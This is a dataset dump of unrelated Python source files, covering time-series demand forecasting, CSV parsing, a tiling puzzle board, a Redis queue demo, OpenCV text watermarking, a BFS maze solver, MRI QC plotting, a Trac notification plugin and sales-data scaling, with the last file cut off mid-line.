self.s[1,:]+y_end[n*24:(n+1)*24]/n2\n\n def predict_dayahead(self,y,T):\n \"\"\"predict_correct_dayahead\n Predict day-ahead demand given previous parameters.\n \"\"\"\n t0=y.index\n m1 = t0.dayofweek>=5\n m1_n = t0.dayofweek<5 \n m2 = t0.hour\n #find temp trend.\n Ttrend= self.Tmodel(T[t0])\n trend=self.l+self.b*np.arange(len(y))\n season=self.s[m1.astype(int),m2]\n #make prediction based on current estimates\n ypred =Ttrend+ trend+season\n return pd.Series(ypred,index=y.index)\n\n def correct_dayahead(self,y,ypred):\n \"\"\"correct_dayahead(y,ypred)\n Updates level, bias and seasonal patterns given \n \"\"\"\n t0=y.index\n m1 = t0.dayofweek>=5\n m1_n = t0.dayofweek<5 \n eps = y-ypred\n eps_l = np.mean(eps)\n self.l += self.alpha*eps_l\n eps=eps-eps_l\n eps_b = (eps[-1]-eps[0])/len(eps)\n self.b += self.beta*eps_b\n eps=eps-eps_b*np.arange(len(eps))\n ds = np.dot(self.gamma(),np.array([m1_n,m1]))*[eps,eps]\n self.s = self.s + ds\n\n def STL_dayahead(self,y,T,ninit=4*24*7):\n \"\"\"STL_dayahead\n Predict day-ahead demand given previous parameters.\n Then update parameters given true demand.\n \"\"\"\n self.fit_init_params(y,T,ninit=ninit)\n t0=y.index[0]\n m1 = t0.dayofweek>=5\n m2 = t0.hour\n ypred = np.zeros(len(y))\n ti = y[:ninit].index\n msk=ti.dayofweek>=5\n Ttrend= self.Tmodel(T[ti])\n trend = self.l+self.b*np.arange(ninit)\n season= self.s[msk.astype(int),ti.hour.values]\n\n ypred[:ninit] =Ttrend+trend+season\n for i in range(int(ninit/24),int(len(y)/24)):\n tslice = slice(i*24,(i+1)*24)\n ypred[tslice] = self.predict_dayahead(y[tslice],T[tslice])\n self.correct_dayahead(y[tslice],ypred[tslice])\n \n # if i%(24*7) ==0:\n # print(\"l: {} b: {}\\n\".format(str(l),str(b)))\n # print(s,\"\\n\")\n ypred=pd.Series(ypred,index=y.index) \n return ypred\n\n def optimize_param(self,y,T,ninit=4*24*7,rtol=0.01,\\\n eta=0.001,lr=0.05,nmax=1000):\n \"\"\"optimize_param\n Use gradient descent to find optimum parameters for learning \n rates alpha,beta,gamma. Wait till all of their values are \n settled to a relative tolerance.\n Cost is root Mean Square Error over whole time series.\n Currently tries to predict day ahead. \n \"\"\"\n self.fit_init_params(y,T)\n #Super clunky way of specifiying names.\n #Why did I think this was superior?\n pred0 = self.STL_dayahead(y,T,ninit=ninit)\n J = self.rmse(y[ninit:],pred0[ninit:])\n Ni=0\n J_opt=J\n #loop over iterations\n for i in range(nmax):\n dJ_max=0\n lr = lr*0.99\n #for each name, tweak the model's variables.\n oldJ=J \n for n in self.names:\n #estimate finite-difference gradient.\n p0=self.__getattribute__(n) \n self.__setattr__(n,p0*(1+eta))\n pred=self.STL_dayahead(y,T,ninit=ninit)\n J2=self.rmse(y[ninit:],pred[ninit:])\n dJ = (J2-J)/(eta*p0)\n #dJ = (J2-J)/J \n #actually update \n #p = p0-lr*dJ/(eta)\n #use mod to truncate gradient.\n if n in self.smooth_names:\n p = p0-lr*np.fmod(dJ,1)\n else:\n p = p0-lr*dJ\n #restrict smoothing parameters to be within [0,1].\n p=self.check_limits(n,p,p0)\n self.__setattr__(n,p)\n J=J2\n dJ_max=max(dJ,dJ_max)\n Ni+=1 \n if (dJ_max1.2*J_opt):\n print('Resetting param to best')\n self.restore_opt_param()\n lr=0.8*lr\n eta=0.8*lr\n \n print(\"Failed to hit tolerance after {} iter\\n\".format(nmax))\n print(\"Cost:\",J,J2)\n return pred \n\n def save_opt_param(self):\n \"\"\"save_opt_param\n\n Saves optimal parameters in variable\n \"\"\"\n pv=[]\n for n in self.names:\n pv.append(self.__getattribute__(n))\n pdict=dict(zip(self.names,pv))\n self.opt_param=pdict\n\n def restore_opt_param(self):\n \"\"\"restore_opt_param\n\n Restore optimal parameters in variable\n \"\"\"\n for n in self.names:\n p=self.opt_param[n]\n self.__setattr__(n,p)\n \n \n def check_limits(self,n,p,p0):\n \"\"\"check_limits\n Ensures smoothing and temperature parameters\n fall within reasonal ranges, e.g. [0,1] for smoothing.\n \"\"\"\n if (n in ['alpha','beta','g00','g01','g10','g11']):\n if (p>1):\n print('param {} >1(!): {}'.format(n,p))\n p=min(p0+0.5*(1-p0),0.99)\n elif(p<0): \n print('param {} <0(!): {}'.format(n,p))\n p=0.25*p0\n #restrict postive/negative temperature thresholds. \n if (n=='Tp' and p<100):\n #nobody wants AC below 10C.\n p=100\n if (n=='Tn' and p>200):\n #nobody wants heating above 20\n p=200\n if (n in ['An','Ap'] and p<0):\n p=0.5*p0\n \n return p \n\n def rmse(self,x,y):\n \"\"\"compute mean_square_error\"\"\"\n z = np.sum( (x-y)*(x-y))/len(x)\n z = np.sqrt(z)\n return z\n \n def plot_pred(self,series_list,label_list):\n \"\"\"make plot to compare fitted parameters\"\"\"\n for s,l in zip(series_list,label_list):\n plt.plot(s,label=l) \n plt.legend()\n plt.show()\n","sub_path":"EBA_seasonal/multiseasonal_temp.py","file_name":"multiseasonal_temp.py","file_ext":"py","file_size_in_byte":9820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"205542344","text":"import csv\nfrom typing import TextIO\ndataset = dict()\na = []\n'''\n\nwith open('acoes.csv') as f:\n reader = csv.reader(f, skipinitialspace=True)\n #header = next(reader)\n #a = [dict(zip(header, map(int, row))) for row in reader]\n a = list(reader)\n a.\nprint (a[0][$])\n\nwith open('regramod.csv','r') as csv_file:\n data=csv.DictReader(csv_file)\n for line in data :\n a.append(line)\nprint(a)\n\nprint(a[0])\n\nwith open(\"regramod.csv\") as myfile:\n for line in myfile:\n values = \"\".join(line.split()).split(',')\n a.append({values[0]:values[1]})\n firstline = True\n for line in myfile:\n if firstline:\n mykeys = \"\".join(line.split()).split(',')\n firstline = False\n else:\n values = \"\".join(line.split()).split(',')\n a.append({mykeys[n]:values[n] for n in range(0,len(mykeys))})\n\n\n\nb = []\nwith open(\"regramod.csv\") as myfile:\n firstline = True\n for line in myfile:\n if firstline:\n mykeys = \"\".join(line.split()).split(',')\n firstline = False\n else:\n values = \"\".join(line.split()).split(',')\n b.append({mykeys[n]:values[n] for n in range(0,len(mykeys))})\nprint(b[]['indice'])\n'''\na = {}\n\nwith open(\"regra_nao_terminal.csv\") as myfile:\n for line in myfile:\n values = \"\".join(line.split()).split(',')\n a.update({values[0]:values[1]})\nprint (a['3'])","sub_path":"ler_A_regra.py","file_name":"ler_A_regra.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"278733276","text":"from patternpieces import PatternPieces\nfrom piece import Piece\nfrom piecesbank import PiecesBank\nfrom ui import UI\nfrom board import Board\nfrom arbiter import Arbiter\nfrom ai import Ai\nimport json\nimport random\n\ndef main():\n\n pb = PiecesBank()\n app = UI()\n ### DO NOT FUCKING REMOVE THIS. I DARE YOU. ###\n app.preloadPieces(pb.pieceslist)\n ai = Ai()\n arbiter = Arbiter()\n board = Board()\n\n app.setBatchMethod(lambda loop, fitness, mutation: ai.main_function(pb, app, arbiter, board, loop, fitness, mutation))\n # app.drawTable(board)\n app.drawTable(generatedSolvedPuzzle(pb))\n ### DO NOT FUCKING REMOVE THIS EITHER. ###\n app.mainloop()\n\n\ndef generatedSolvedPuzzle(pb):\n ret = Board()\n for y in range(16):\n for x in range(16):\n ret[x, y] = pb.pieceslist[x + y * 16]\n if (y != 0):\n if (y % 2 == 0):\n ret[x, y].upEdge = PatternPieces.YELLOWFLOWERINBLUE\n else:\n ret[x, y].upEdge = PatternPieces.BLUESTARINYELLOW\n else:\n ret[x, y].upEdge = PatternPieces.EDGE\n\n if (x != 15):\n if (x % 2 == 0):\n ret[x, y].rightEdge = PatternPieces.BLUEGEARINPINK\n else:\n ret[x, y].rightEdge = PatternPieces.YELLOWSTARINPURPLE\n else:\n ret[x, y].rightEdge = PatternPieces.EDGE\n\n if (y != 15):\n if (y % 2 == 1):\n ret[x, y].downEdge = PatternPieces.YELLOWFLOWERINBLUE\n else:\n ret[x, y].downEdge = PatternPieces.BLUESTARINYELLOW\n else:\n ret[x, y].downEdge = PatternPieces.EDGE\n\n if (x != 0):\n if (x % 2 == 1):\n ret[x, y].leftEdge = PatternPieces.BLUEGEARINPINK\n else:\n ret[x, y].leftEdge = PatternPieces.YELLOWSTARINPURPLE\n else:\n ret[x, y].leftEdge = PatternPieces.EDGE\n return ret\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"488623698","text":"import redis\nfrom multiprocessing import Process\nimport time\nimport random\n\nclass LianjiaSpider(object):\n def __init__(self):\n self.r = redis.Redis(\n host='127.0.0.1',port=6379,db=0\n )\n\n # 生产者事件函数 - 生成100个URL,放到redis列表中\n def product(self):\n for i in range(1,101):\n url = 'http://lianjia.com/pg{}'.format(i)\n self.r.lpush('lianjia:urls',url)\n time.sleep(random.randint(1,2))\n\n # 消费者事件函数 - 获取URL,进行数据抓取\n def consumer(self):\n while True:\n result = self.r.brpop('lianjia:urls',3)\n if result:\n print('正在抓取:',result[1].decode())\n else:\n break\n\n\n # 入口函数\n def run(self):\n p1 = Process(target=self.product)\n p2 = Process(target=self.consumer)\n p1.start()\n p2.start()\n p1.join()\n p2.join()\n\nif __name__ == '__main__':\n spider = LianjiaSpider()\n spider.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"redis/day01/03_list_queue.py","file_name":"03_list_queue.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"600357250","text":"import cv2\nimport numpy as np\nfrom watermark_img_1 import create_mask, remove_background, create_invisible_image\n\n\ndef create_txt_image(text, color_text, save_mask, font_size):\n font_scale = 1\n thickness = 2\n font_text = cv2.FONT_HERSHEY_SIMPLEX\n rows_txt, cols_txt = 0, 0\n if len(text) > 0:\n rows_txt = cv2.getTextSize(text, font_text, 1, 2)[0][1] + 5\n cols_txt = cv2.getTextSize(text, font_text, 1, 2)[0][0] + 5\n if font_size == 0:\n rows_txt = rows_txt + 3*len(text)\n cols_txt = cols_txt + 8*len(text)\n elif font_size == 1 and (\"q\" in list(text) or \"y\" in list(text) or \"g\" in list(text) or \"j\" in list(text)):\n rows_txt = rows_txt + 10\n\n mask_img = np.zeros((rows_txt, cols_txt, 3), dtype='uint8')\n textsize = cv2.getTextSize(text, font_text, 1, 2)[0]\n pozX = (mask_img.shape[1] - textsize[0]) // 2\n pozY = (mask_img.shape[0] + textsize[1]) // 2\n cv2.putText(mask_img, text, (pozX, pozY), font_text, font_scale, color_text, thickness, cv2.LINE_AA)\n cv2.imwrite(\"mask.png\", mask_img)\n\n if save_mask == 1:\n cv2.putText(mask_img, text, (pozX, pozY), font_text, font_scale, (255, 255, 255), thickness, cv2.LINE_AA)\n cv2.imwrite(\"mask_text.png\", mask_img)\n else:\n mask_img.fill(255)\n cv2.imwrite(\"mask_text.png\", mask_img)\n\n\n\ndef add_logo_text(path_image, path_logo, alpha, x_poz, y_poz, who_save):\n if who_save:\n img = cv2.imread(path_image)\n else:\n img = path_image\n logo = cv2.imread(path_logo)\n mask_overlay = np.zeros((img.shape[0], img.shape[1], 3), dtype=\"uint8\")\n mask_overlay[x_poz:x_poz + logo.shape[0], y_poz:y_poz + logo.shape[1]] = logo\n logo_image = img.copy()\n logo_image = cv2.addWeighted(mask_overlay, alpha, logo_image, 1, 0, logo_image)\n if who_save:\n cv2.imshow('image with logo', logo_image)\n cv2.waitKey(0)\n cv2.imwrite(\"logo_img.png\", logo_image)\n else:\n return logo_image\n\n\ndef compute_mask_text(path_image, x_poz, y_poz, how_arg):\n if how_arg:\n img = cv2.imread(path_image)\n else:\n img = path_image\n mask_img = cv2.imread('mask_text.png')\n y1, y2 = y_poz, y_poz + mask_img.shape[1]\n x1, x2 = x_poz, x_poz + mask_img.shape[0]\n # print(\"mash shape\", mask_img.shape[:2])\n # print(\"x1-y1\", x1, y1,\"x2-y2\", x2, y2)\n total_list = []\n rows, cols = mask_img.shape[:2]\n for i in range(rows):\n for j in range(cols):\n total_list.append(list(mask_img[i, j]))\n\n mask = np.zeros(img.shape[:])\n elem = 0\n # rows, cols = mask.shape[:2]\n # print(len(total_list))\n for i in range(x1, x2-1):\n for j in range(y1-1, y2-1):\n # print(i, j, total_list[elem], elem)\n mask[i, j] = total_list[elem]\n elem = elem + 1\n # cv2.imshow(\"maskaaaa\", mask)\n # cv2.waitKey(0)\n cv2.imwrite('rm_mask.png', mask)\n\n\n\ndef remove_logo_text(path_image, arg):\n if arg:\n img = cv2.imread(path_image)\n else:\n img = path_image\n mask = cv2.imread('rm_mask.png', 0)\n image_result = cv2.inpaint(img, mask, 3, cv2.INPAINT_TELEA)\n if arg:\n cv2.imshow(\"result\", image_result)\n cv2.waitKey(0)\n cv2.imwrite(\"rl_image.png\", image_result)\n else:\n return image_result\n\ndef add_watermark_text(path_image, text, color, save, alpha, poz_x, poz_y):\n create_txt_image(text, color, save, 1)\n create_mask(\"mask.png\")\n remove_background(\"mask.png\")\n create_invisible_image()\n add_logo_text(path_image, 'invisible_bkd.png', alpha, poz_x, poz_y, 1)\n\ndef remove_watermark_text(path_image, poz_x, poz_y):\n compute_mask_text(path_image, poz_x, poz_y, 1)\n remove_logo_text(path_image, 1)\n\n# create_txt_image('ana are mere', (255,0,255), 0, 1)\n#\n# create_mask(\"mask.png\")\n# remove_background(\"mask.png\")\n# create_invisible_image()\n# add_logo_text(\"d.jpg\", 'invisible_bkd.png', 0.5, 50, 50, 1)\n\n\n# print(\"lalalallaaaa\")\n\n\n# add_watermark_text(\"d.jpg\", \"ana are mere\",(255,0,255), 0,0.5, 50, 50)\n# compute_mask_text(\"logo_img.png\", 5, 50, 1)\n# remove_logo_text('logo_img.png', 1)\n\n","sub_path":"watermark_text_1.py","file_name":"watermark_text_1.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"654041959","text":"## Hill climbing version of random monkey algorithm.\n\nimport random\n\nalphabet = \"abcdefghijklmnopqrstuvwxyz \"\nshakespeare = \"methinks it is like a weasel\"\n\ndef random_char_generator():\n return random.choice(alphabet)\n\ndef compare_chars(char1, char2):\n return char1 == char2\n\ndef generate_and_score():\n best_sentence_so_far = \"\"\n number_of_tries = 0\n current_index = 0 \n while current_index < len(shakespeare):\n random_char = random_char_generator()\n if compare_chars(random_char, shakespeare[current_index]):\n best_sentence_so_far += random_char\n current_index += 1\n print(best_sentence_so_far)\n number_of_tries += 1\n print(\"It only took \" + str(number_of_tries) + \" tries!\")\n\ngenerate_and_score()\n","sub_path":"1_introduction/infinite_monkey_theorem_hill_climbing.py","file_name":"infinite_monkey_theorem_hill_climbing.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"485367993","text":"\"\"\"\n미로 탈출\n\nN * M 크기의 직사각형 형태의 미로에 갇혀 있다.\n미로에는 여러 마리의 괴물이 있어 이를피해 탈출해야한다.\n현재 위치는 (1, 1)이고 미로의 출구는 (N, M)의 위치에 존재하며 한 번에 한 칸씩 이동할 수 있다.\n이때 괴물이 있는 부분은 0으로, 괴물이 없는 부분은 1로 표시되어 있다.\n미로는 반드시 탈출할 수 있는 형태로 제시된다. 이때 동빈이가 탈출하기 위해 움직여야 하는 최소 칸의 개수를 구하시오.\n칸을 셀 떄는 시작 칸과 마지막 칸을 모두 포함해서 계산한다.\n\n입력조건\n- 첫째 줄에 두 정수 N, M(4 <= N, M <= 200)이 주어집니다.\n다음 N개의 줄에는 각각 M개의 정수(0혹은 1)로 미로의 정보가 주어진다.\n각각의 수들은 공백 없이붙어서 입력으로 제시된다. 또한 시작 칸과 마지막 칸은 항상 1이다.\n\n출력조건\n- 첫째 줄에 최소 이동 칸의 개수를 출력한다.\n\"\"\"\n\nfrom collections import deque\n\nn,m=map(int,input().split())\ngraph=[]\nfor i in range(n):\n\tgraph.append(list(map(int,input())))\n\ndx=[0,0,1,-1]\ndy=[1,-1,0,0]\n\ndef bfs(start_x,start_y):\n\tqueue=deque()\n\tqueue.append((start_x,start_y))\n\n\twhile queue:\n\t\tx,y=queue.popleft()\n\n\t\tfor i in range(4):\n\t\t\tnext_x=x+dx[i]\n\t\t\tnext_y=y+dy[i]\n\n\t\t\tif next_x<0 or next_x>n-1 or next_y<0 or next_y>m-1:\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif graph[next_x][next_y]==0:\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif graph[next_x][next_y]==1:\n\t\t\t\tqueue.append((next_x,next_y))\n\t\t\t\tgraph[next_x][next_y]=graph[x][y]+1\n\t\n\treturn graph[n-1][m-1]\n\nprint(bfs(0,0))","sub_path":"DFS,BFS/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"610489207","text":"# -*- coding: utf-8 -*-\n#\n# @author Vladimir S. FONOV\n# @date 14/08/2015\n#\n# Longitudinal pipeline resampling\n\nimport shutil\nimport os\nimport sys\nimport csv\nimport traceback\n\n# MINC stuff\nfrom ipl.minc_tools import mincTools,mincError\nfrom ipl.minc_qc import qc,qc_field_contour\n\n\ndef draw_qc_stx(in_scan,in_outline,out_qc,options={}):\n if options.get('big'):\n with mincTools() as m:\n m.qc(in_scan.scan,out_qc.fname,\n big=True,mask=in_outline.scan,\n mask_range=[0.0,1.0])\n else:\n qc(in_scan.scan,out_qc.fname,\n mask=in_outline.scan,\n mask_range=[0.0,1.0],\n mask_bg=0.5, use_max=True)\n\n\ndef draw_qc_mask(in_scan,out_qc,options={}):\n if options.get('big'):\n with mincTools() as m:\n m.qc(in_scan.scan,out_qc.fname,\n big=True,mask=in_scan.mask,\n mask_range=[0.0,1.0])\n else:\n qc(in_scan.scan,out_qc.fname,\n mask=in_scan.mask,\n mask_range=[0.0,1.0],\n mask_bg=0.5, use_max=True)\n\ndef draw_qc_cls(in_scan,in_cls,out_qc,options={}):\n if options.get('big'):\n with mincTools() as m:\n m.qc(in_scan.scan,out_qc.fname,\n big=True,mask=in_cls.scan,\n mask_range=[0.0,3.5],\n spectral_mask=True)\n else:\n qc(in_scan.scan,out_qc.fname,\n mask=in_cls.scan,\n mask_range=[0.0,3.5],\n mask_cmap='spectral',\n mask_bg=0.5, use_max=True)\n\n\ndef draw_qc_lobes(in_scan,in_lobes,out_qc,options={}):\n if options.get('big'):\n with mincTools() as m:\n m.qc(in_scan.scan,out_qc.fname,\n big=True,mask=in_lobes.scan,\n spectral_mask=True)\n else:\n qc(in_scan.scan,out_qc.fname,\n mask=in_lobes.scan,\n mask_cmap='spectral',\n mask_bg=0.5, use_max=True)\n\n\ndef draw_qc_add(in_scan1,in_scan2,out_qc,options={}):\n if options.get('big'):\n with mincTools() as m:\n m.qc(in_scan1.scan,out_qc.fname,\n big=True,red=True,\n mask=in_scan2.scan,\n green_mask=True)\n else:\n qc(in_scan1.scan,out_qc.fname,\n mask=in_scan2.scan,\n image_cmap='red',\n mask_cmap='green',\n mask_bg=0.5, use_max=True)\n\ndef draw_qc_nu(in_field,out_qc,options={}):\n qc_field_contour(in_field.scan,out_qc.fname,\n image_cmap='jet')\n\n\n# kate: space-indent on; indent-width 4; indent-mode python;replace-tabs on;word-wrap-column 80\n","sub_path":"ipl/lp/qc.py","file_name":"qc.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"3275376","text":"\nimport pandas\n\nfrom sklearn import naive_bayes\n\nfrom sklearn import datasets;\n\n\n\ndef pandasFun():\n\n dataInfo = pandas.read_fwf(\"brain_body.txt\")\n\n x_values = dataInfo['Brain']\n y_values = dataInfo['Body']\n\n return x_values, y_values\n\n\n\ndef bayesTest():\n iris = datasets.load_iris()\n\n gnb = naive_bayes.GaussianNB()\n\n trainData = gnb.fit(iris.data, iris.target)\n\n y = trainData.predict(iris.data)\n\n\n print(iris.data.shape[0])\n\n\n\n\nif __name__ == \"__main__\":\n\n x, y = pandasFun();\n\n len = len(x)\n\n\n\n bayesTest()","sub_path":"SourceCode/trainCode/regression/pandasTest.py","file_name":"pandasTest.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"168669680","text":"from trac.core import Component, implements\nfrom announcerplugin.api import IAnnouncementSubscriber, istrue\nfrom announcerplugin.api import IAnnouncementPreferenceProvider\nfrom trac.ticket import model\nfrom trac.web.chrome import add_warning\nfrom trac.config import ListOption\nimport re\n\nclass TicketCustomFieldSubscriber(Component):\n implements(IAnnouncementSubscriber)\n\n custom_cc_fields = ListOption('announcer', 'custom_cc_fields',\n doc=\"Field names that contain users that should be notified on \"\n \"ticket changes\")\n \n def get_subscription_realms(self):\n return ('ticket',)\n \n def get_subscription_categories(self, realm):\n if realm == \"ticket\":\n return('changed', 'created', 'attachment added')\n else:\n ()\n \n def get_subscriptions_for_event(self, event):\n if event.realm == 'ticket':\n ticket = event.target\n if event.category in ('changed', 'created', 'attachment added'):\n for sub in self._get_membership(event.target):\n yield sub\n\n def _get_membership(self, ticket):\n for field in self.custom_cc_fields:\n subs = ticket[field] or ''\n for chunk in re.split('\\s|,', subs):\n chunk = chunk.strip()\n if not chunk or chunk.startswith('@'):\n continue\n if '@' in chunk:\n address = chunk\n name = None\n else:\n name = chunk\n address = None\n if name or address:\n self.log.debug(\"TicketCustomFieldSubscriber \" \\\n \"added '%s <%s>'\"%(name,address))\n yield ('email', name, name and True or False, address)\n\n","sub_path":"announcerplugin/0.11/announcerplugin/subscribers/ticket_custom.py","file_name":"ticket_custom.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"424017647","text":"\"\"\"CPU functionality.\"\"\"\n\nimport sys\n\n\"\"\" \nls8.py runs this code:\n\n cpu = CPU()\n\n cpu.load()\n cpu.run()\n\n\"\"\"\nclass CPU:\n \"\"\"Main CPU class.\"\"\"\n\n def __init__(self):\n \"\"\"Construct a new CPU.\"\"\"\n self.ram = [0] * 256\n self.reg = [0] * 8\n self.running = False\n \n self.pc = 0\n \n # stack pointer initializes at ram[f4]\n # f4 | 244 | 0b11110100\n # hex: 0xf4 | binary: 0b11110100\n self.sp = 0xf4\n\n # MAR = Memory Address Register\n # MDR = Memory Data Register\n\n # using \"addr\" and \"data\" for readability\n\n def ram_read(self, addr):\n return self.ram[addr]\n\n def ram_write(self, addr, data):\n self.ram[addr] = data\n\n # load from file\n # ---------------------------------\n # sys.argv[1] reads the user's cmd line input after this python filename\n # int(\"num_string\", 2) converts binary string to int\n\n def load(self):\n \"\"\"Load a program into memory.\"\"\"\n\n\n #program starts at ram[0]\n ram_addr = 0\n\n program = []\n program_file = open(sys.argv[1], 'r')\n\n for line in program_file:\n if line[0]==\"#\":\n continue\n \n elif line[0].isspace()==True:\n continue\n\n else:\n formatted_line = int(line[0:8],2)\n program.append(formatted_line)\n\n # print(program)\n program_file.close()\n\n # load each parsed line into the ram starting at 0\n for instruction in program:\n self.ram[ram_addr] = instruction\n ram_addr += 1\n\n\n # ALU - returns math calculations on op_a and op_b\n # ---------------------------------\n # Does not increment the pc\n\n def alu(self, op, reg_a, reg_b):\n \"\"\"ALU operations.\"\"\"\n\n if op == \"ADD\":\n self.reg[reg_a] += self.reg[reg_b]\n #elif op == \"SUB\": etc\n elif op == \"MUL\":\n self.reg[reg_a] *= self.reg[reg_b]\n else:\n raise Exception(\"Unsupported ALU operation\")\n\n\n # Trace - run self.trace() to debug\n # ---------------------------------\n def trace(self):\n \"\"\"\n Handy function to print out the CPU state. You might want to call this\n from run() if you need help debugging.\n \"\"\"\n\n print(f\"TRACE: %02X | %02X %02X %02X |\" % (\n self.pc,\n #self.fl,\n #self.ie,\n self.ram_read(self.pc),\n self.ram_read(self.pc + 1),\n self.ram_read(self.pc + 2)\n ), end='')\n\n for i in range(8):\n print(\" %02X\" % self.reg[i], end='')\n print()\n \n\n # Running Loop\n # ---------------------------------\n def run(self):\n \"\"\"Run the CPU.\"\"\"\n self.running = True\n\n\n # Run Opcodes\n # ---------------------------------\n # HLT | 1 | 0b00000001\n def run_hlt(self):\n # Stop the program\n # print(\"HALT\")\n self.running = False\n\n # TODO RET | 17 | 0b00010001\n def run_ret(self):\n # return from the subroutine\n # pop the value from the top of the stack\n # store the value in the pc (program counter)\n # print(\"RET\")\n self.sp += 1 \n self.pc = self.ram[self.sp]\n\n # PUSH | 69 | 0b1000101\n def run_push(self):\n # push a value to the stack\n # copy the value in reg[op_a] to ram[sp]\n self.ram[self.sp] = self.reg[operand_a]\n # print(f\"PUSH: {self.reg[operand_a]} to ram[{self.sp}] from reg[{operand_a}]\")\n\n # decrement the stack pointer (sp)\n self.sp -= 1\n\n self.pc += 2\n\n # POP | 70 | 0b01000110 \n def run_pop(self):\n # pop the value at the top of the stack\n # into reg[op_a]\n # increment stack pointer\n self.sp += 1\n self.reg[operand_a] = self.ram[self.sp]\n # print(f\"POP: {self.ram[self.sp]} to reg[{operand_a}] from ram[{self.sp}]\")\n\n self.pc += 2\n\n # PRN | 71 | 0b01000111\n def run_prn(self):\n # print the value at reg[op_a]\n # print(f\"PRN: {self.reg[operand_a]} from reg[{operand_a}]\")\n print(self.reg[operand_a])\n self.pc += 2\n\n # CALL | 80 | 0b01010000 \n def run_call(self):\n # calls a subroutine\n # jumps to address stored in reg[op_a]\n # address to return to AFTER the call is pushed to the stack\n\n # print(f\"CALL: a:{operand_a}\")\n # push next address to stack\n self.ram[self.sp] = self.pc + 2\n self.sp -= 1\n\n # set PC to stored address\n self.pc = self.reg[operand_a]\n\n # LDI | 130 | 0b10000010\n def run_ldi(self):\n # load integer(op_b) into reg[op_a]\n # print(f\"LDI: load {operand_b} to reg[{operand_a}]\")\n self.reg[operand_a] = operand_b\n\n self.pc += 3 \n\n # ADD (alu) | 160 | 0b10100000 \n def run_add(self):\n # using the ALU: reg[op_a] += reg[op_b]\n # print(\"ADD\")\n self.alu(\"ADD\",operand_a,operand_b)\n self.pc += 3\n\n # MUL (alu) | 162 | 0b10100010\n def run_mul(self):\n # using the ALU: reg[op_a] *= reg[op_b]\n # print(\"MUL\")\n self.alu(\"MUL\",operand_a,operand_b)\n self.pc += 3\n\n\n # Select & Dispatch Opcodes\n # ---------------------------------\n dispatch = {\n # HLT | 1 | 0b00000001\n 0b00000001: run_hlt,\n # RET | 17 | 0b00010001\n 0b00010001: run_ret,\n # PUSH | 69 | 0b1000101\n 0b1000101: run_push,\n # POP | 70 | 0b01000110 \n 0b01000110: run_pop,\n # PRN | 71 | 0b01000111\n 0b01000111: run_prn,\n # CALL | 80 | 0b01010000 \n 0b1010000: run_call,\n # LDI | 130 | 0b10000010\n 0b10000010: run_ldi,\n # ADD (alu) | 160 | 0b10100000\n 0b10100000: run_add,\n # MUL (alu) | 162 | 0b10100010\n 0b10100010: run_mul,\n }\n\n cmd_list = dispatch.keys()\n\n\n # Loop Starts\n # ---------------------------------\n while self.running == True:\n # run this for debugging\n # self.trace()\n\n # fetch command using program counter\n cmd_code = self.ram[self.pc]\n\n operand_a = self.ram[self.pc + 1]\n operand_b = self.ram[self.pc + 2]\n\n if cmd_code in cmd_list:\n # valid command, dispatch a function\n # print(\"cmd:\",cmd_code)\n cmd_run=dispatch[cmd_code](self)\n\n else:\n # command not recognized\n # to print binary add :b\n print(f\"I don't understand the command at ram[{self.pc}]: {self.ram[self.pc]} | {self.ram[self.pc]:b}\")\n print(\"Program exited\")\n self.running = False\n","sub_path":"ls8/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":7104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"117097632","text":"import pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\n\n# 从csv文件中加载训练数据\ntraining_data_df = pd.read_csv(\"./dataset/sales_data_training.csv\", dtype=float)\n\n# 拆分输入和输出\nX_training = training_data_df.drop('销售总额', axis=1).values\nY_training = training_data_df[['销售总额']].values\n\n# 加载测试数据\ntest_data_df = pd.read_csv(\"./dataset/sales_data_testing.csv\", dtype=float)\n\n# 拆分输入输出\nX_testing = test_data_df.drop('销售总额', axis=1).values\nY_testing = test_data_df[['销售总额']].values\n\n# 数据归一化:也可以像keras tutorial中那样统一用一个scaler\nX_scaler = MinMaxScaler(feature_range=(0, 1))\nY_scaler = MinMaxScaler(feature_range=(0, 1))\n\n# 输入输出都归一化\nX_scaled_training = X_scaler.fit_transform(X_training)\nY_scaled_training = Y_scaler.fit_transform(Y_training)\n\n# 很重要:训练数据和测试数据必须采用相同的归一化\nX_scaled_testing = X_scaler.transform(X_testing)\nY_scaled_testing = Y_scaler.transform(Y_testing)\n\nprint(X_scaled_testing.shape)\nprint(Y_scaled_testing.shape)\n\nprint(\"Note: Y values were scaled by multiplying by {:.10f} and adding {:.4f}\".format(Y_scaler.scale_[0], 